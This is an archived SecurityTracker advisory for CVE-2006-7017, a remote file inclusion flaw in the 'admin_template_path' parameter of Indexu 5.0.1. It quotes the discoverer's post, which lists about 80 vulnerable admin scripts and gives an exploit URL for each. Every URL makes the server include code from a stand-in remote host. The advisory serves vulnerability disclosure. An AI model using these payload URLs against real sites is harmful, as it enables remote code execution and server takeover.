SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Indexu Vendors:   nicecoder.com
Indexu Include File Bug in 'admin_template_path' Parameter Lets Administrators Execute Arbitrary Code
SecurityTracker Alert ID:  1016330
SecurityTracker URL:  http://securitytracker.com/id/1016330
CVE Reference:   CVE-2006-7017   (Links to External Site)
Updated:  May 19 2009
Original Entry Date:  Jun 19 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 5.0.1
Description:   A vulnerability was reported in Indexu. A remote user can include and execute arbitrary code on the target system.

Multiple administrative scripts do not properly validate user-supplied input in the 'admin_template_path' parameter. A remote authenticated administrator can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

The following files are affected:

admin/app_change_email.php
admin/app_change_pwd.php
admin/app_mod_rewrite.php
admin/app_page_caching.php
admin/app_setup.php
admin/cat_add.php
admin/cat_delete.php
admin/cat_edit.php
admin/cat_path_update.php
admin/cat_search.php
admin/cat_struc.php
admin/cat_view.php
admin/cat_view_hidden.php
admin/cat_view_hierarchy.php
admin/cat_view_registered_only.php
admin/checkurl_web.php
admin/db_alter.php
admin/db_alter_change.php
admin/db_backup.php
admin/db_export.php
admin/db_import.php
admin/editor_add.php
admin/editor_delete.php
admin/editor_validate.php
admin/head.php
admin/index.php
admin/inv_config.php
admin/inv_config_payment.php
admin/inv_create.php
admin/inv_delete.php
admin/inv_edit.php
admin/inv_markpaid.php
admin/inv_markunpaid.php
admin/inv_overdue.php
admin/inv_paid.php
admin/inv_send.php
admin/inv_unpaid.php
admin/lang_modify.php
admin/link_add.php
admin/link_bad.php
admin/link_bad_delete.php
admin/link_checkurl.php
admin/link_delete.php
admin/link_duplicate.php
admin/link_edit.php
admin/link_premium_listing.php
admin/link_premium_sponsored.php
admin/link_search.php
admin/link_sponsored_listing.php
admin/link_validate.php
admin/link_validate_edit.php
admin/link_view.php
admin/log_search.php
admin/mail_modify.php
admin/menu.php
admin/message_create.php
admin/message_delete.php
admin/message_edit.php
admin/message_send.php
admin/message_subscriber.php
admin/message_view.php
admin/review_validate.php
admin/review_validate_edit.php
admin/summary.php
admin/template_active.php
admin/template_add_custom.php
admin/template_delete.php
admin/template_delete_file.php
admin/template_duplicate.php
admin/template_export.php
admin/template_import.php
admin/template_manager.php
admin/template_modify.php
admin/template_modify_file.php
admin/template_rename.php
admin/user_add.php
admin/user_delete.php
admin/user_edit.php
admin/user_search.php
admin/whos.php

CrAsh_oVeR_rIdE discovered this vulnerability.
Impact:   A remote authenticated administrator can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.nicecoder.com/idx_main.php (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents
Subject:  Indexu v 5.0.01 Multiple Remote File Include Vulnerabilities

Discovered By CrAsh_oVeR_rIdE

indexu remote file include

--------------------------

site of script:http://www.nicecoder.com/

-------------------------------------------------

Vulnerable: INDEXU v5.0.1


file include

------------

include($admin_template_path."msg.php");

admin_template_path parameter File inclusion

--------------------------------------------------

vulnerable files:

admin/app_change_email.php

admin/app_change_pwd.php

admin/app_mod_rewrite.php

admin/app_page_caching.php

admin/app_setup.php

admin/cat_add.php

admin/cat_delete.php

admin/cat_edit.php

admin/cat_path_update.php

admin/cat_search.php

admin/cat_struc.php

admin/cat_view.php

admin/cat_view_hidden.php

admin/cat_view_hierarchy.php

admin/cat_view_registered_only.php

admin/checkurl_web.php

admin/db_alter.php

admin/db_alter_change.php

admin/db_backup.php

admin/db_export.php

admin/db_import.php

admin/editor_add.php

admin/editor_delete.php

admin/editor_validate.php

admin/head.php

admin/index.php

admin/inv_config.php

admin/inv_config_payment.php

admin/inv_create.php

admin/inv_delete.php

admin/inv_edit.php

admin/inv_markpaid.php

admin/inv_markunpaid.php

admin/inv_overdue.php

admin/inv_paid.php

admin/inv_send.php

admin/inv_unpaid.php

admin/lang_modify.php

admin/link_add.php

admin/link_bad.php

admin/link_bad_delete.php

admin/link_checkurl.php

admin/link_delete.php

admin/link_duplicate.php

admin/link_edit.php

admin/link_premium_listing.php

admin/link_premium_sponsored.php

admin/link_search.php

admin/link_sponsored_listing.php

admin/link_validate.php

admin/link_validate_edit.php

admin/link_view.php

admin/log_search.php

admin/mail_modify.php

admin/menu.php

admin/message_create.php

admin/message_delete.php

admin/message_edit.php

admin/message_send.php

admin/message_subscriber.php

admin/message_view.php

admin/review_validate.php

admin/review_validate_edit.php

admin/summary.php

admin/template_active.php

admin/template_add_custom.php

admin/template_delete.php

admin/template_delete_file.php

admin/template_duplicate.php

admin/template_export.php

admin/template_import.php

admin/template_manager.php

admin/template_modify.php

admin/template_modify_file.php

admin/template_rename.php

admin/user_add.php

admin/user_delete.php

admin/user_edit.php

admin/user_search.php

admin/whos.php

-------------------------------------------------

example:

http://example.com/indexu/admin/app_change_email.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/app_change_pwd.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/app_mod_rewrite.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/app_page_caching.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/app_setup.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/cat_add.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/cat_delete.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/cat_edit.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/cat_path_update.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/cat_search.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/cat_struc.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/cat_view.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/cat_view_hidden.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/cat_view_hierarchy.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/cat_view_registered_only.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/checkurl_web.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/db_alter.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/db_alter_change.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/db_backup.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/db_export.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/db_import.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/editor_add.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/editor_delete.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/editor_validate.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/head.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/index.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/inv_config.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/inv_config_payment.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/inv_create.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/inv_delete.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/inv_edit.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/inv_markpaid.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/inv_markunpaid.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/inv_overdue.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/inv_paid.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/inv_send.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/inv_unpaid.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/lang_modify.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/link_add.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/link_bad.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/link_bad_delete.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/link_checkurl.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/link_delete.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/link_duplicate.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/link_edit.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/link_premium_listing.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/link_premium_sponsored.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/link_search.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/link_sponsored_listing.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/link_validate.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/link_validate_edit.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/link_view.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/log_search.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/mail_modify.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/menu.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/message_create.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/message_delete.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/message_edit.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/message_send.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/message_subscriber.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/message_view.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/review_validate.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/review_validate_edit.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/summary.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/template_active.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/template_add_custom.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/template_delete.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/template_delete_file.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/template_duplicate.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/template_export.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/template_import.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/template_manager.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/template_modify.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/template_modify_file.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/template_rename.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/user_add.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/user_delete.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/user_edit.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/user_search.php?admin_template_path=http://evilcode.txt?

http://example.com/indexu/admin/whos.php?admin_template_path=http://evilcode.txt?

--------------------------------------------------

Discovered By CrAsh_oVeR_rIdE

E-mail:KARKOR23@hotmail.com

Site:www.lezr.com

Greetz:KING-HACKER,YOUNG HACKER,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3 AND ALL LEZR.COM Member


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC